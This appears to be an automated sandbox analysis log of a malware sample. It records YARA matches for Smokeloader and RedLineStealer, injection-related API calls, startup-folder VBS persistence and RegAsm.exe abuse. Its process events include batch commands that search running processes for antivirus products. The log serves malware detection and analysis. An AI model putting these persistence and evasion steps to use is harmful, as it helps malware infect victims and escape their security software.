        Source: C:\Users\user\AppData\Roaming\jagviseCode function: 5_2_00401666 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401666
        Source: C:\Users\user\AppData\Roaming\jagviseCode function: 5_2_00401674 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401674
        Source: C:\Users\user\AppData\Roaming\jagviseCode function: 5_2_00401678 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401678
        Source: C:\Users\user\AppData\Roaming\jagviseCode function: 5_2_0040282B NtEnumerateKey,NtClose,5_2_0040282B
        Source: C:\Users\user\AppData\Roaming\jagviseCode function: 5_2_0040163B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_0040163B
        Source: C:\Users\user\AppData\Roaming\jagviseCode function: 5_2_0040343D GetForegroundWindow,NtMapViewOfSection,NtAllocateVirtualMemory,NtDuplicateObject,NtQuerySystemInformation,NtQueryInformationProcess,NtOpenKey,NtQueryKey,NtEnumerateKey,RtlCreateUserThread,strstr,wcsstr,tolower,towlower,5_2_0040343D
        Source: C:\Users\user\AppData\Roaming\jagviseCode function: 5_2_0040249E NtQuerySystemInformation,NtQueryInformationProcess,5_2_0040249E
        Source: C:\Users\user\AppData\Roaming\jagviseCode function: 5_2_004027E6 NtClose,5_2_004027E6
        Source: C:\Users\user\AppData\Local\Temp\A723.exeCode function: 7_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,7_2_004038AF
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeCode function: 14_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,14_2_00403883
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_0041E3C00_2_0041E3C0
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_0042175C0_2_0042175C
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_0041F87B0_2_0041F87B
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_004203030_2_00420303
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_0041FDBF0_2_0041FDBF
        Source: C:\Users\user\AppData\Roaming\jagviseCode function: 5_2_0041E3C05_2_0041E3C0
        Source: C:\Users\user\AppData\Roaming\jagviseCode function: 5_2_0042175C5_2_0042175C
        Source: C:\Users\user\AppData\Roaming\jagviseCode function: 5_2_0041F87B5_2_0041F87B
        Source: C:\Users\user\AppData\Roaming\jagviseCode function: 5_2_004203035_2_00420303
        Source: C:\Users\user\AppData\Roaming\jagviseCode function: 5_2_0041FDBF5_2_0041FDBF
        Source: C:\Users\user\AppData\Local\Temp\A723.exeCode function: 7_2_0040737E7_2_0040737E
        Source: C:\Users\user\AppData\Local\Temp\A723.exeCode function: 7_2_00406EFE7_2_00406EFE
        Source: C:\Users\user\AppData\Local\Temp\A723.exeCode function: 7_2_004079A27_2_004079A2
        Source: C:\Users\user\AppData\Local\Temp\A723.exeCode function: 7_2_004049A87_2_004049A8
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeCode function: 12_2_0150ABB012_2_0150ABB0
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeCode function: 12_2_0150ED9012_2_0150ED90
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeCode function: 12_2_01501CA012_2_01501CA0
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeCode function: 12_2_0150ABA312_2_0150ABA3
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeCode function: 12_2_0150B13812_2_0150B138
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeCode function: 12_2_01501C9012_2_01501C90
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeCode function: 12_2_075FE6A012_2_075FE6A0
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeCode function: 12_2_075FDBC812_2_075FDBC8
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeCode function: 12_2_075E004012_2_075E0040
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeCode function: 12_2_075E001D12_2_075E001D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0101281813_2_01012818
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_01012B7813_2_01012B78
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_010180B113_2_010180B1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_010180F813_2_010180F8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0101280813_2_01012808
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_01017FDB13_2_01017FDB
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_02CB200913_2_02CB2009
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_02CB8F4813_2_02CB8F48
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_02CB228213_2_02CB2282
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_02CBD03813_2_02CBD038
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_02CB3C4013_2_02CB3C40
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_02CB6C1E13_2_02CB6C1E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0532E55013_2_0532E550
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_053225E013_2_053225E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_053237A013_2_053237A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_05336D6013_2_05336D60
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0533C42813_2_0533C428
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0533C41813_2_0533C418
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0533547013_2_05335470
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_05336CDB13_2_05336CDB
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0533A97013_2_0533A970
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0533A96013_2_0533A960
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0533481813_2_05334818
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0533E33113_2_0533E331
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0533E34013_2_0533E340
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeCode function: 14_2_0040497C14_2_0040497C
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeCode function: 14_2_00406ED214_2_00406ED2
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeCode function: 14_2_004074BB14_2_004074BB
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Bookings 865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
        Source: C:\Users\user\AppData\Local\Temp\A723.exeCode function: String function: 004062CF appears 58 times
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeCode function: String function: 004062A3 appears 58 times
        Source: hoEtvOOrYH.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
        Source: jagvise.1.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
        Source: hoEtvOOrYH.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 00000000.00000002.1732204208.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
        Source: 00000000.00000002.1732453969.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
        Source: 00000005.00000002.1983884104.0000000000A28000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000000.00000002.1732280470.00000000008AA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000005.00000002.1983794099.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
        Source: 00000000.00000002.1732336579.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
        Source: 00000005.00000002.1983746430.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
        Source: 00000005.00000002.1983822753.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
        Source: 12.2.3E6C.exe.3f89550.2.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
        Source: 12.2.3E6C.exe.3f89550.2.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
        Source: 12.2.3E6C.exe.3f89550.2.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
        Source: 12.2.3E6C.exe.3f89550.2.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
        Source: 12.2.3E6C.exe.3f89550.2.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
        Source: 12.2.3E6C.exe.3f89550.2.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
        Source: 12.2.3E6C.exe.3f89550.2.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
        Source: 12.2.3E6C.exe.3f89550.2.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
        Source: 12.2.3E6C.exe.3f89550.2.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
        Source: 12.2.3E6C.exe.3f89550.2.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@30/31@13/8
        Source: C:\Users\user\AppData\Local\Temp\A723.exeCode function: 7_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,7_2_004044D1
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_008ADA84 CreateToolhelp32Snapshot,Module32First,0_2_008ADA84
        Source: C:\Users\user\AppData\Local\Temp\A723.exeCode function: 7_2_004024FB CoCreateInstance,7_2_004024FB
        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jagviseJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
        Source: C:\Users\user\AppData\Roaming\Result.exeMutant created: NULL
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\c3afda6f3dcb
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7004:120:WilError_03
        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A723.tmpJump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Result.vbs"
        Source: hoEtvOOrYH.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: hoEtvOOrYH.exeReversingLabs: Detection: 60%
        Source: unknownProcess created: C:\Users\user\Desktop\hoEtvOOrYH.exe "C:\Users\user\Desktop\hoEtvOOrYH.exe"
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\jagvise C:\Users\user\AppData\Roaming\jagvise
        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A723.exe C:\Users\user\AppData\Local\Temp\A723.exe
        Source: C:\Users\user\AppData\Local\Temp\A723.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Birth Birth.cmd && Birth.cmd
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3E6C.exe C:\Users\user\AppData\Local\Temp\3E6C.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\C3F.exe C:\Users\user\AppData\Local\Temp\C3F.exe
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Focused Focused.cmd & Focused.cmd
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Result.vbs"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Result.exe "C:\Users\user\AppData\Roaming\Result.exe"
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A723.exe C:\Users\user\AppData\Local\Temp\A723.exeJump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3E6C.exe C:\Users\user\AppData\Local\Temp\3E6C.exeJump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\C3F.exe C:\Users\user\AppData\Local\Temp\C3F.exeJump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Result.vbs" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Birth Birth.cmd && Birth.cmdJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Focused Focused.cmd & Focused.cmd
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Result.exe "C:\Users\user\AppData\Roaming\Result.exe"
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeSection loaded: msvcr100.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: cdprt.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: smartscreenps.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\jagviseSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\jagviseSection loaded: msimg32.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\jagviseSection loaded: msvcr100.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: rsaenh.dllJump to behavior
